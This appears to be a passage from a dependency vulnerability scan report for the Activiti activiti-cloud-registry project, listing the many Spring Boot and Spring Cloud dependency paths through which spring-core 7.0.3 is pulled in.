  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
